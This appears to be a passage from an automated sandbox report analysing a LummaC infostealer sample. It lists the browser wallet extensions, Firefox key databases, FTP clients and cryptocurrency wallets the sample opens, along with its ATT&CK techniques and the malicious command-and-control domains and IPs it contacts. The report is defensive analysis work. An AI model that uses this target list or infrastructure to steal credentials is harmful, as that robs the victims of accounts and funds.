Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Yara match	File source: 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2587726023.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2615711054.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	4 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0x001f00000004676d-1858.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://prisonyfork.buzz/	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/))	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/apie	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/api	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/3g	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/apib	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/Y	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/c	100%	Avira URL Cloud	malware
https://prisonyfork.buzz:443/apiu	100%	Avira URL Cloud	malware
https://prisonyfork.buzz/ak	100%	Avira URL Cloud	malware
https://prisonyfork.buzz:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
prisonyfork.buzz	104.21.74.40	true	true		unknown
mindhandru.buzz	104.21.11.101	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
hummskitnj.buzz	false		high
mindhandru.buzz	false		high
https://prisonyfork.buzz/api	true	Avira URL Cloud: malware	unknown
https://mindhandru.buzz/api	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://prisonyfork.buzz/	0x001f00000004676d-1858.exe, 00000005.00000003.2561982257.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615787536.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000002.3284275434.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.3279490490.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2585820862.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000002.3283985421.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2561395114.00000000057D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://prisonyfork.buzz/ak	0x001f00000004676d-1858.exe, 00000005.00000003.2615787536.000000000321B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://prisonyfork.buzz/apie	0x001f00000004676d-1858.exe, 00000005.00000003.2513297201.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	0x001f00000004676d-1858.exe	false		high
http://ocsp.entrust.net02	0x001f00000004676d-1858.exe	false		high
https://prisonyfork.buzz/apib	0x001f00000004676d-1858.exe, 00000005.00000003.2615787536.000000000321B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://prisonyfork.buzz/))	0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.000000000319A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://prisonyfork.buzz/3g	0x001f00000004676d-1858.exe, 00000005.00000002.3284275434.00000000057D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mindhandru.buzz:443/api	0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.0000000003183000.00000004.00000020.00020000.00000000.sdmp	false		high
https://prisonyfork.buzz/Y	0x001f00000004676d-1858.exe, 00000005.00000003.2633654001.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513297201.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657628427.000000000321B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/ts1ca.crl0	0x001f00000004676d-1858.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://prisonyfork.buzz/c	0x001f00000004676d-1858.exe, 00000005.00000003.2633654001.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657628427.000000000321B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa03	0x001f00000004676d-1858.exe	false		high
https://prisonyfork.buzz:443/apiu	0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.0000000003183000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aia.entrust.net/ts1-chain256.cer01	0x001f00000004676d-1858.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	0x001f00000004676d-1858.exe, 00000005.00000003.2657473252.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657571584.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615686778.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513277599.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2587700923.00000000031F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://prisonyfork.buzz:443/api	0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.0000000003183000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	0x001f00000004676d-1858.exe	false		high
https://www.entrust.net/rpa0	0x001f00000004676d-1858.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.74.40	prisonyfork.buzz	United States		13335	CLOUDFLARENETUS	true
104.21.11.101	mindhandru.buzz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581423
Start date and time:	2024-12-27 15:34:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0x001f00000004676d-1858.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/1@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 59 Number of non-executed functions: 172
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 0x001f00000004676d-1858.exe, PID 4996 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 0x001f00000004676d-1858.exe

Simulations

Behavior and APIs

Time	Type	Description
09:35:27	API Interceptor	9x Sleep call for process: 0x001f00000004676d-1858.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.74.40	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse
104.21.74.40	https://new.express.adobe.com/webpage/sAiKE1YBfM7xe	Get hash	malicious	HTMLPhisher	Browse
104.21.11.101	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse
	GnHq2ZaBUl.exe	Get hash	malicious	LummaC	Browse
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	onaUtwpiyq.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mindhandru.buzz	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	O53VxanH6A.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	GnHq2ZaBUl.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
prisonyfork.buzz	setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.192
prisonyfork.buzz	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse	104.21.74.40

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.11.101
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	Vq50tK1Nx2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	O53VxanH6A.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	IzDjbVdHha.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
CLOUDFLARENETUS	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.11.101
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	Vq50tK1Nx2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	O53VxanH6A.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	IzDjbVdHha.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.74.40 104.21.11.101
